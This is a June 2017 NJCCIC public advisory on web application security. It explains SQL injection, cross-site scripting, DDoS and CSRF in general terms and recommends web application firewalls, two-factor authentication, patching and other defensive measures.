June 21, 2017
TLP: WHITE | The NJCCIC assesses with high confidence that many organizations, in both the public and private sectors, continue to operate web applications (apps) and servers that are vulnerable to exploitation or attacks that could result in unauthorized access, disruption of services, theft of customer information, or manipulation of data. Web apps are often exposed to the internet with a front end that is open to the public or available to authorized users via a website, which makes them susceptible to external threats and difficult to protect, given the need to ensure their accessibility. In many cases, web apps are targeted opportunistically due to software vulnerabilities, limited or absent defensive measures, or poor authentication requirements. While web-based threats cannot be eliminated, the risk of successful exploits or attacks can be reduced by implementing web application firewalls, two-factor authentication, and other best practices.
- According to Verizon’s 2017 Data Breach Investigation Report, there were 6,502 security incidents involving web apps in 2016 and web apps remained the most prevalent vector for data breaches, with 571 instances of confirmed data disclosure. More recently, Symantec reported that its software blocked over 1.2 million web attacks in the month of May, a 22 percent increase from April and the highest monthly volume observed since November 2015.
Examples of Web App Threats
- Structured Query Language injection (SQLi) is one of the most common web app threats and involves the injection of an SQL query via a data input field within a web app. If successful, a malicious actor could read or modify data in a database, execute administrator functions, and possibly issue commands to the underlying operating system.
- Cross-site scripting (XSS) allows a hacker to exploit the input function on a website to send malicious scripts to a different end user. An XSS script can access cookies, session tokens, and other sensitive user information, or even rewrite the content of an HTML webpage. XSS vulnerabilities in websites are widespread.
- Distributed denial-of-service (DDoS) attacks are intended to render a website or application unresponsive, preventing users from accessing the site to do business or purchase items. They are typically conducted using botnets to generate traffic from tens or hundreds of thousands of devices that overwhelms the targeted system, ultimately degrading or disrupting its service and denying access to users.
- Cross-site request forgery (CSRF or XSRF), also known as session riding, is when a malicious actor transmits unauthorized commands or performs unwanted actions from a trusted user’s browser. Using CSRF, a hacker could change a victim’s credentials or conduct fraudulent financial transactions, among other actions.
The NJCCIC strongly recommends the use of web application firewalls (WAFs) to protect web servers and individual apps, or sets of apps, from web-based threats. WAFs can be network-based or host-based, and can analyze Application Layer (Layer 7) traffic to and from a web server or app to defend against known threats, such as those listed above, as well as buffer overflow, session hijacking, and others. WAFs may also defend against unknown threats by identifying and blocking anomalous behavior. In addition to deploying WAFs, the following measures are recommended:
- Implement the OWASP secure coding practices to mitigate the most common software vulnerabilities.
- Require two-factor authentication for access to all systems and apps that store sensitive or confidential data.
- Limit or eliminate the storage of unnecessary personal information or credentials within web apps.
- Any data that could be of value to malicious actors must be encrypted at rest and in transit.
- Ensure all software, particularly content management systems and plugins, are kept up-to-date with the latest security patches and, if possible, set to install updates automatically.
- Discontinue the use of any unnecessary software, as well as software no longer supported by the vendor.
- Perform regular scanning and testing of web apps to identify potential input validation weaknesses.
Traffic Light Protocol: WHITE information may be distributed without restriction.